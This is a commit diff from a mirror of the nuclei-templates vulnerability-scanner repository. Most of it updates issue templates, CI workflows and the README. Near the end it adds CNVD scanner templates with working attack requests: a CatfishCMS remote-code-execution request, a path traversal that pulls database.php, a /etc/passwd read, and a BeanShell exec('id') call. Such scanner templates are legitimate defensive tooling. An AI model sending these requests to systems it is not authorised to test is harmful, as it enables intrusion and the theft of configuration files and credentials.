daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into master

patch-1
Sandeep Singh 2021-12-29 21:28:30 +05:30 committed by GitHub
parent bb89d0a7d9 ce97393f95
commit a10aff06e5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2367 changed files with 72699 additions and 7353 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
.github/ISSUE_TEMPLATE/bug_report.md vendored
View File

@ -1,32 +0,0 @@
---
name: Bug report
about: Create a issue to help us improve
title: "[Bug] "
labels: ''
assignees: ''
---
**Nuclei version**
```
nuclei -version
```
**Nuclei template version**
```
cat ~/.nuclei-config.json
```
**Describe the bug**
A clear and concise description of what the bug is.
**Commands to reproduce**
```
nuclei -t xxx -target xxx
```
**Screenshots**
If applicable, add screenshots to help explain your problem.

14
.github/ISSUE_TEMPLATE/config.yml vendored Normal file
View File

@ -0,0 +1,14 @@
blank_issues_enabled: false
contact_links:
- name: Ask an question / advise on using nuclei-templates
url: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/q-a
about: Ask a question or request support for using nuclei-templates
- name: Share idea / feature to discuss for nuclei-templates
url: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/ideas
about: Share idea / feature to discuss for nuclei-templates
- name: Connect with PD Team & Community (Discord)
url: https://discord.gg/projectdiscovery
about: Connect with PD Team & Community for direct communication

21
.github/ISSUE_TEMPLATE/false-negative.md vendored Normal file
View File

@ -0,0 +1,21 @@
---
name: False Negative
about: 'Issue for template missing valid/expected result.'
labels: 'false-negative'
---
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
### Nuclei Version:
<!-- You can find current version of nuclei with "nuclei -version" -->
### Template file:
<!-- Template producing false-negative results, for example: "cves/XX/XX.yaml" -->
### Command to reproduce:
<!-- Please include the command to replicate the behavior so fix can be applied asap. -->
<!-- if host information can not be shared publicly, please reach out to us on discord server in DM -->

28
.github/ISSUE_TEMPLATE/false-positive.md vendored
View File

@ -1,30 +1,24 @@
---
name: False Positive
about: 'Create an issue if you found false positive results. '
title: "[false-positive] template-name "
about: 'Issue for template producing invalid/unexpected result.'
labels: 'false-positive'
assignees: ''
---
**Nuclei version**
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
```
nuclei -version
```
### Nuclei Version:
**Nuclei template version**
<!-- You can find current version of nuclei with "nuclei -version" -->
```
cat ~/.nuclei-config.json
```
### Template file:
**Template ID**
<!-- Template producing false-positive results, for example: "cves/XX/XX.yaml" -->
Please submit the ID template producing false-positive results.
### Command to reproduce:
**Commands to Reproduce**
<!-- Please include the command to replicate the behavior so fix can be applied asap. -->
<!-- if host information can not be shared publicly, please reach out to us on discord server in DM -->
```
nuclei -t template_id -target ?
```
### Anything else:
<!-- Links? References? Screnshots? Anything that will give us more context about the issue that you are encountering! -->

22
.github/ISSUE_TEMPLATE/feature_request.md vendored
View File

@ -1,16 +1,18 @@
---
name: Feature request
about: Suggest an idea to improve nuclei templates
title: "[Feature] "
labels: ''
assignees: ''
about: Request feature to implement in this project
labels: 'Type: Enhancement'
---
**Is your feature request related to a problem? Please describe.**
<!--
1. Please make sure to provide a detailed description with all the relevant information that might be required to start working on this feature.
2. In case you are not sure about your request or whether the particular feature is already supported or not, please start a discussion instead.
3. GitHub Discussion: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/ideas
4. Join our discord server at https://discord.gg/projectdiscovery to discuss the idea on the #nuclei-templates channel.
-->
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
### Please describe your feature request:
<!-- A clear and concise description of feature to implement -->
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
### Describe the use case of this feature:
<!-- A clear and concise description of the feature request's motivation and the use-cases in which it could be useful. -->

21
.github/ISSUE_TEMPLATE/issue-report.md vendored Normal file
View File

@ -0,0 +1,21 @@
---
name: Issue report
about: "Issue to report invalid template"
labels: 'Type: Bug'
---
<!--
1. Please search to see if an issue already exists for the bug you encountered.
2. For support requests, FAQs or "How to" questions, please use the GitHub Discussions section instead - https://github.com/projectdiscovery/nuclei-templates/discussions or
3. Join our discord server at https://discord.gg/projectdiscovery and post the question on the #nuclei-templates channel.
-->
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
### Issue description:
<!-- A concise description of what you're experiencing. -->
### Anything else:
<!-- Links? References? Screnshots? Anything that will give us more context about the issue that you are encountering! -->

22
.github/ISSUE_TEMPLATE/submit-template.md vendored
View File

@ -1,15 +1,23 @@
---
name: Submit Template
about: Submit nuclei template using issue
title: "[nuclei-template] template-name"
name: Template Contribution
about: Contributing nuclei template using GitHub Issue
labels: 'nuclei-template'
assignees: ''
---
**Template Details**
### Template Information:
<!-- Include basic information of the template including reference -->
<!-- Templates without any reference mostly likely to take more time for review/validation -->
### Nuclei Template:
<!-- Include nuclei template in between code block shared below -->
```yaml
nuclei template goes here
```
<!-- Include template results if available or redacted valid response snippet of valid match -->
<!-- Example response help us to update the matchers as unique as possible to avoid possible false-positive results. -->

49
.github/scripts/README.tmpl vendored
View File

@ -3,7 +3,7 @@ f"""
<h1 align="center">
Nuclei Templates
</h1>
<h4 align="center">Community curated list of templates for the nuclei engine to find a security vulnerability in application.</h4>
<h4 align="center">Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.</h4>
<p align="center">
@ -24,25 +24,21 @@ Nuclei Templates
----
Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine.
This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community.
We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list.
## Nuclei Templates overview
An overview of the nuclei template directory including number of templates associated with each directory.
An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is [available here](TEMPLATES-STATS.md), and also available in [JSON](TEMPLATES-STATS.json) format for integration.
<table>
<tr>
<td>
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | {countTpl("cves/*")} | vulnerabilities | {countTpl("vulnerabilities/*")} | exposed-panels | {countTpl("exposed-panels")} |
| takeovers | {countTpl("takeovers")} | exposures | {countTpl("exposures/*")} | technologies | {countTpl("technologies")} |
| misconfiguration | {countTpl("misconfiguration")} | workflows | {countTpl("workflows")} | miscellaneous | {countTpl("miscellaneous")} |
| default-logins | {countTpl("default-logins/*")} | file | {countTpl("file/*")} | dns | {countTpl("dns")} |
| fuzzing | {countTpl("fuzzing")} | helpers | {countTpl("helpers/*")} | iot | {countTpl("iot")} |
{get_top10()}
**{command("tree", -2, None)}**.
@ -50,34 +46,39 @@ An overview of the nuclei template directory including number of templates assoc
</tr>
</table>
📖 Documentation
-----
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates.
We have also added a set of templates to help you understand how things work.
💪 Contributions
-----
Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
Nuclei-templates is powered by major contributions from the community.
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")
💬 Discussion
-----
Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
Have questions / doubts / ideas to discuss?
Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
👨‍💻 Community
-----
You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
💡 Notes
-----
- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
You are welcome to join the active [Discord Community](https://discord.gg/projectdiscovery) to discuss directly with project maintainers and share things with others around security and automation.
Additionally, you may follow us on [Twitter](https://twitter.com/pdnuclei) to be updated on all the things about Nuclei.
Thanks again for your contribution and keeping the community vibrant. :heart:
"""
<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors">
<img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&max=300">
</a>
</p>
Thanks again for your contribution and keeping this community vibrant. :heart:
"""

5
.github/scripts/update-readme.py vendored
View File

@ -8,6 +8,11 @@ def countTpl(path):
def command(args, start=None, end=None):
return "\n".join(subprocess.run(args, text=True, capture_output=True).stdout.split("\n")[start:end])[:-1]
def get_top10():
HEADER = "## Nuclei Templates Top 10 statistics\n\n"
TOP10 = command(["cat", "TOP-10.md"])
return HEADER + TOP10 if len(TOP10) > 0 else ""
if __name__ == "__main__":
version = command(["git", "describe", "--tags", "--abbrev=0"])
template = eval(open(".github/scripts/README.tmpl", "r").read())

46
.github/workflows/cve-annotate.yml vendored Normal file
View File

@ -0,0 +1,46 @@
name: ✍🏻 CVE Annotate
on:
push:
branches:
- master
workflow_dispatch:
jobs:
docs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
with:
persist-credentials: false
fetch-depth: 0
token: ${{ secrets.GITHUB_TOKEN }}
- uses: actions/setup-go@v2
with:
go-version: 1.17
- name: Generate CVE Annotations
id: cve-annotate
run: |
if ! which cve-annotate > /dev/null; then
echo -e "Command cve-annotate not found! Installing\c"
go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev
fi
cve-annotate -i ./cves/ -d .
echo "::set-output name=changes::$(git status -s | wc -l)"
- name: Commit files
if: steps.cve-annotate.outputs.changes > 0
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git add cves
git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a
- name: Push changes
if: steps.cve-annotate.outputs.changes > 0
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}

47
.github/workflows/readme-update.yml vendored Normal file
View File

@ -0,0 +1,47 @@
name: 📝 Readme Update
on:
workflow_run:
workflows: ["🗒 Templates Stats"]
types:
- completed
workflow_dispatch:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
steps:
- name: Install tree
run: sudo apt-get install tree -y
- name: Check out code
uses: actions/checkout@master
with:
persist-credentials: false
fetch-depth: 0
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: "3.8"
- name: Update README
id: readme-update
run: |
python .github/scripts/update-readme.py
echo "::set-output name=changes::$(git status -s | wc -l)"
- name: Commit files
if: steps.readme-update.outputs.changes > 0
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto README Update [$(date)] :robot:" -a
- name: Push changes
if: steps.readme-update.outputs.changes > 0
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}

37
.github/workflows/template-validate.yml vendored Normal file
View File

@ -0,0 +1,37 @@
name: 🛠 Template Validate
on: [ push, pull_request ]
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- name: Get latest Nuclei release version
id: nuclei-latest
uses: actions/github-script@v5
with:
result-encoding: string
script: |
const release = await github.rest.repos.getLatestRelease({
owner: 'projectdiscovery',
repo: 'nuclei',
});
return release.data.name
- name: Setup Nuclei
if: steps.nuclei-latest.outputs.result != ''
env:
VERSION: ${{ steps.nuclei-latest.outputs.result }}
run: |
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
sudo unzip nuclei*.zip -d /usr/local/bin
working-directory: /tmp
- name: Template Validation
run: |
cp -r ${{ github.workspace }} $HOME
nuclei -validate -t .
nuclei -validate -w ./workflows

52
.github/workflows/templates-stats.yml vendored Normal file
View File

@ -0,0 +1,52 @@
name: 🗒 Templates Stats
on:
workflow_dispatch:
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- uses: actions/setup-go@v2
with:
go-version: 1.17
- name: Installing Template Stats
run: |
go install github.com/projectdiscovery/templates-stats@main
shell: bash
- name: Markdown Stats
run: |
templates-stats -output TEMPLATES-STATS.md -path /home/runner/work/nuclei-templates/nuclei-templates/
shell: bash
- name: JSON Stats
run: |
templates-stats -output TEMPLATES-STATS.json -json -path /home/runner/work/nuclei-templates/nuclei-templates/
shell: bash
- name: Top 10 Stats
run: |
templates-stats -output TOP-10.md -top 10 -path /home/runner/work/nuclei-templates/nuclei-templates/
shell: bash
- name: Get statistical changes
id: stats
run: echo "::set-output name=changes::$(git status -s | wc -l)"
- name: Commit files
if: steps.stats.outputs.changes > 0
run: |
git add TEMPLATES-STATS.*
git add TOP-10.md
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto Generated Templates Stats [$(date)] :robot:" -a
- name: Push changes
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}

48
.github/workflows/update-readme.yml vendored
View File

@ -1,48 +0,0 @@
name: 📝 Readme Update
on:
push:
branches:
- master
create:
tags:
- v*
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master'
steps:
- name: Install tree
run: sudo apt-get install tree -y
- name: Check out code
uses: actions/checkout@master
with:
persist-credentials: false
fetch-depth: 0
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: "3.8"
- name: Update README
id: update-readme
run: |
python .github/scripts/update-readme.py
echo "::set-output name=changes::$(git status -s | wc -l)"
- name: Commit files
if: steps.update-readme.outputs.changes > 0
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto Update README [$(date)] :robot:" -a
- name: Push changes
if: steps.update-readme.outputs.changes > 0
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}

3
.gitignore vendored
View File

@ -1,2 +1,5 @@
.idea/
.DS_Store
local/
.checksum
.new-additions

5
.nuclei-ignore
View File

@ -8,10 +8,9 @@
# unless asked for by the user.
tags:
- "fuzz"
- "dos"
- "misc"
- "fuzz"
- "revision"
# files is a list of files to ignore template execution
# unless asked for by the user.
# unless asked for by the user.

0
.pre-commit-config.yaml → .pre-commit-config.yml
View File

2
.yamllint
View File

@ -2,7 +2,7 @@
extends: default
ignore: |
.pre-commit-config.yaml
.pre-commit-config.yml
.github/workflows/*.yml
rules:

100
CONTRIBUTING.md Normal file
View File

@ -0,0 +1,100 @@
# Template Contribution Guidelines
This documentation contains a set of guidelines to help you during the contribution process.
We are happy to welcome all the contributions from anyone willing to **improve/add** new **templates** to this project.
Thank you for helping out and remember, **no contribution is too small.**
# Submitting Nuclei Templates 👩‍💻👨‍💻
Below you will find the process and workflow used to review and merge your changes.
## Step 1 : Find existing templates
- Take a look at the [Existing Templates](https://github.com/projectdiscovery/nuclei-templates) before creating new one.
- Take a look at Existing Templates in [GitHub Issues](https://github.com/projectdiscovery/nuclei-templates/issues) and [Pull Request](https://github.com/projectdiscovery/nuclei-templates/pulls) section to avoid duplicate work.
- Take a look at [Templates](https://nuclei.projectdiscovery.io/templating-guide/) and [Matchers](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers) Guideline for creating new template.
## Step 2 : Fork the Project
- Fork this Repository. This will create a Local Copy of this Repository on your Github Profile. Keep a reference to the original project in `upstream` remote.
<img width="928" alt="template-fork" src="https://user-images.githubusercontent.com/8293321/124467966-2afde200-ddb6-11eb-835f-8f8fc2fabedb.png">
```sh
git clone https://github.com/<your-username>/nuclei-templates
cd nuclei-templates
git remote add upstream https://github.com/projectdiscovery/nuclei-templates
```
- If you have already forked the project, update your copy before working.
```sh
git remote update
git checkout master
git rebase upstream/master
```
## Step 3 : Create your Template Branch
Create a new branch. Use its name to identify the issue your addressing.
```sh
# It will create a new branch with name template_branch_name and switch to that branch
git checkout -b template_branch_name
```
## Step 4 : Create Template and Commit
- Create your template.
- Add all the files/folders needed.
- After you've made changes or completed template creation, add changes to the branch you've just created by:
```sh
# To add all new files to branch template_branch_name
git add .
```
- To commit, give a descriptive message for the convenience of the reviewer by:
```sh
# This message get associated with all files you have changed
git commit -m "Added/Fixed/Updated XXX Template"
```
**NOTE**:
- A Pull Request should have only one unique template to make it simple for review.
- Multiple templates for same technology can be grouped into single Pull Request.
## Step 5 : Push Your Changes
- Now you are ready to push your template to the remote (forked) repository.
- When your work is ready and complies with the project conventions, upload your changes to your fork:
```sh
# To push your work to your remote repository
git push -u origin template_branch_name
```
## Step 6 : Pull Request
- Fire up your favorite browser, navigate to your GitHub repository, then click on the New pull request button within the Pull requests tab. Provide a meaningful name and description to your pull request, that describes the purpose of the template.
- Voila! Your Pull Request has been submitted. It will be reviewed and merged by the moderators, if it complies with project standards, otherwise a feedback will be provided.🥳
## Need more help?🤔
You can refer to the following articles of Git and GitHub basics. In case you are stuck, feel free to contact the Project Mentors and Community by joining [PD Community](https://discord.gg/projectdiscovery) Discord server.
- [Forking a Repo](https://help.github.com/en/github/getting-started-with-github/fork-a-repo)
- [Cloning a Repo](https://help.github.com/en/desktop/contributing-to-projects/creating-an-issue-or-pull-request)
- [How to create a Pull Request](https://opensource.com/article/19/7/create-pull-request-github)
- [Getting started with Git and GitHub](https://towardsdatascience.com/getting-started-with-git-and-github-6fcd0f2d4ac6)
- [Learn GitHub from Scratch](https://lab.github.com/githubtraining/introduction-to-github)
## Tip from us😇
- **Nuclei** outcomes are only as excellent as **template matchers💡**
- Declare at least two matchers to reduce false positive
- Avoid matching words reflected in the URL to reduce false positive
- Avoid short word that could be encountered anywhere

28
PULL_REQUEST_TEMPLATE.md Normal file
View File

@ -0,0 +1,28 @@
### Template / PR Information
<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->
- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:
### Template Validation
I've validated this template locally?
- [ ] YES
- [ ] NO
#### Additional Details (leave it blank if not applicable)
<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->
### Additional References:
- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)

62
README.md
View File

@ -3,7 +3,7 @@
<h1 align="center">
Nuclei Templates
</h1>
<h4 align="center">Community curated list of templates for the nuclei engine to find a security vulnerability in application.</h4>
<h4 align="center">Community curated list of templates for the nuclei engine to find security vulnerabilities in applications.</h4>
<p align="center">
@ -24,59 +24,73 @@ Nuclei Templates
----
Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
Templates are the core of the [nuclei scanner](https://github.com/projectdiscovery/nuclei) which powers the actual scanning engine.
This repository stores and houses various templates for the scanner provided by our team, as well as contributed by the community.
We hope that you also contribute by sending templates via **pull requests** or [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) to grow the list.
## Nuclei Templates overview
An overview of the nuclei template directory including number of templates associated with each directory.
An overview of the nuclei template project, including statistics on unique tags, author, directory, severity, and type of templates. The table below contains the top ten statistics for each matrix; an expanded version of this is [available here](TEMPLATES-STATS.md), and also available in [JSON](TEMPLATES-STATS.json) format for integration.
<table>
<tr>
<td>
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 357 | vulnerabilities | 199 | exposed-panels | 154 |
| takeovers | 68 | exposures | 107 | technologies | 107 |
| misconfiguration | 71 | workflows | 32 | miscellaneous | 25 |
| default-logins | 31 | file | 42 | dns | 10 |
| fuzzing | 10 | helpers | 9 | iot | 13 |
## Nuclei Templates Top 10 statistics
**119 directories, 1343 files**.
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 934 | daffainfo | 366 | cves | 940 | info | 948 | http | 2572 |
| lfi | 393 | dhiyaneshdk | 347 | vulnerabilities | 367 | high | 713 | file | 57 |
| panel | 334 | pikpikcu | 287 | exposed-panels | 333 | medium | 533 | network | 48 |
| xss | 291 | pdteam | 222 | technologies | 231 | critical | 332 | dns | 12 |
| wordpress | 274 | geeknik | 173 | exposures | 196 | low | 170 | | |
| exposure | 254 | dwisiswant0 | 158 | misconfiguration | 168 | | | | |
| rce | 238 | pussycat0x | 97 | token-spray | 143 | | | | |
| tech | 237 | gy741 | 92 | takeovers | 65 | | | | |
| cve2021 | 201 | 0x_akoko | 84 | default-logins | 64 | | | | |
| wp-plugin | 188 | princechaddha | 77 | file | 57 | | | | |
**195 directories, 2764 files**.
</td>
</tr>
</table>
📖 Documentation
-----
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new and your **own custom** templates, we have also added many example templates for easy understanding.
Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to **build** new or your own **custom** templates.
We have also added a set of templates to help you understand how things work.
💪 Contributions
-----
Nuclei-templates is powered by major contributions from the community. [Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
Nuclei-templates is powered by major contributions from the community.
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")
💬 Discussion
-----
Have questions / doubts / ideas to discuss? feel free to open a discussion using [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
Have questions / doubts / ideas to discuss?
Feel free to open a discussion on [Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) board.
👨‍💻 Community
-----
You are welcomed to join our [Discord Community](https://discord.gg/KECAGdH). You can also follow us on [Twitter](https://twitter.com/pdiscoveryio) to keep up with everything related to projectdiscovery.
💡 Notes
-----
- Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/) to validate the syntax of templates before sending pull requests.
You are welcome to join the active [Discord Community](https://discord.gg/projectdiscovery) to discuss directly with project maintainers and share things with others around security and automation.
Additionally, you may follow us on [Twitter](https://twitter.com/pdnuclei) to be updated on all the things about Nuclei.
Thanks again for your contribution and keeping the community vibrant. :heart:
<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors">
<img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&max=300">
</a>
</p>
Thanks again for your contribution and keeping this community vibrant. :heart:

1
TEMPLATES-STATS.json Normal file
View File

File diff suppressed because one or more lines are too long

1145
TEMPLATES-STATS.md Normal file
View File

File diff suppressed because it is too large Load Diff

12
TOP-10.md Normal file
View File

@ -0,0 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 934 | daffainfo | 366 | cves | 940 | info | 948 | http | 2572 |
| lfi | 393 | dhiyaneshdk | 347 | vulnerabilities | 367 | high | 713 | file | 57 |
| panel | 334 | pikpikcu | 287 | exposed-panels | 333 | medium | 533 | network | 48 |
| xss | 291 | pdteam | 222 | technologies | 231 | critical | 332 | dns | 12 |
| wordpress | 274 | geeknik | 173 | exposures | 196 | low | 170 | | |
| exposure | 254 | dwisiswant0 | 158 | misconfiguration | 168 | | | | |
| rce | 238 | pussycat0x | 97 | token-spray | 143 | | | | |
| tech | 237 | gy741 | 92 | takeovers | 65 | | | | |
| cve2021 | 201 | 0x_akoko | 84 | default-logins | 64 | | | | |
| wp-plugin | 188 | princechaddha | 77 | file | 57 | | | | |

27
cnvd/CNVD-2019-06255.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CNVD-2019-06255
info:
name: CatfishCMS RCE
author: Lark-Lab
severity: medium
reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
tags: rce,cvnd,catfishcms
requests:
- method: GET
path:
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
condition: and
words:
- 'OS'
- 'PATH'
- 'SHELL'
- 'USER'

9
cnvd/CNVD-2020-68596.yaml
View File

@ -12,24 +12,17 @@ requests:
- |
POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 5
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: deflate
"1":1
- |
GET /public/index.php/home/file/user_pics HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip
Accept-Encoding: deflate
- |
GET {{endpoint}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: deflate
extractors:
- type: regex

3
cnvd/CNVD-2021-15822.yaml
View File

@ -12,7 +12,6 @@ requests:
- |
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
@ -20,7 +19,7 @@ requests:
- type: regex
regex:
- "root:[x*]:0:0"
- "root:.*:0:0"
- type: status
status:

8
cnvd/CNVD-2021-30167.yaml
View File

@ -4,9 +4,9 @@ info:
name: UFIDA NC BeanShell Remote Code Execution
author: pikpikcu
severity: high
reference: |
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491
reference:
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491
tags: beanshell,rce,cnvd
requests:
@ -14,7 +14,6 @@ requests:
- | #linux
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("id");
@ -22,7 +21,6 @@ requests:
- | #windows
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
